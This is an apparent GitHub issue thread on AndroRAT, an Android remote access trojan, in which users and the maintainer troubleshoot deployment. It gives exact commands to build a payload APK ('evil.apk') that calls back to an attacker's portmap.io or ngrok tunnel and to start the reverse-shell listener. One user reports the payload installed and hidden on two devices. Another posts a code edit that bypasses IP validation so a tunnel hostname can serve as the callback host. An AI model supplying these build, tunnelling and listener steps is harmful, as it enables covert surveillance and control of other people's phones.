### ISSUE TITLE
not able to use portmap io

### ISSUE THREAD

**Issue by vipuluthaiah** [karma9874/AndroRAT#40]
how to config ports?
eg:python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk 

my portmap.io is:
tcp://DarkNotch-49754.portmap.host:49754 => 8989

how should i config the ports
is it

python androRAT.py --build -i 193.161.193.99  -p 49754 -o evil.apk 

or
python androRAT.py --build -i 193.161.193.99  -p 8989 -o evil.apk 

and how should i listen to the connection?
python androRAT.py --shell -i 193.161.193.99 -p 49754 
or
python androRAT.py --shell -i 193.161.193.99 -p 8989

**Comment by karma9874** [comment]
python androRAT.py --build -i 193.161.193.99 -p 49754 -o evil.apk
python androRAT.py --shell -i 0.0.0.0 -p 8989

**Comment by vipuluthaiah** [comment]
app installed ...on diff devices like:moto e4 plus andorid 7.1
and samsung tab 
i am not getting connection back!
![d80e6da1-91bc-4068-b73e-567f9511aea3](https://user-images.githubusercontent.com/45168922/97728376-7f4e1500-1af7-11eb-84fc-2436de6a2644.jpg)
the payload was successfully installed and it hidded too..
what can be the issue

**Comment by karma9874** [comment]
are you sure 193.161.193.99 is ip of DarkNotch?

**Comment by vipuluthaiah** [comment]
![image](https://user-images.githubusercontent.com/45168922/97783166-f77e0e80-1bbb-11eb-8e7e-93a2a06bed3a.png)

**Comment by rajat7k** [comment]
i  m also unable to use portmap.io......is there any other way to make connection..??

**Comment by karma9874** [comment]
ngrok

**Comment by rajat7k** [comment]
in portmap.io its make connection but no command is running and after one command connection get break....and not able to connect again

![Screenshot (106)](https://user-images.githubusercontent.com/63193296/97952362-1bf80780-1dc3-11eb-97b4-30d14e29466d.png)

**Comment by Mr-silentcoder** [comment]
open AndroRat.py then  remove this 2 lines..

if is_valid_ip(args.ip):
    ip = args.ip
else:
    _# print(Fore.RED+"Not a valid IP"+Fore.RESET)_ **-->** hide or remove
    _# sys.exit()_ **--->** hide or remove
    **ip = args.ip**  <-- add this line 

then save..

my portmap link - tcp://name.portmap.io:1234  => 4444

androRAT.py --build -i **name.portmap.io** -p **1234**


**connection  back command**


ifconfig tun0   

add your portmap ip -->    **-i**     <-- here

androRAT.py --shell -i 10.9.124.112 -p 4444

<br />

**#sorry for my bad english <3**

**Comment by karma9874** [comment]
Added ngrok support to the app, so now you can use `--ngrok` mode which will use ngrok and create a reverse proxy between the localhost and your android app
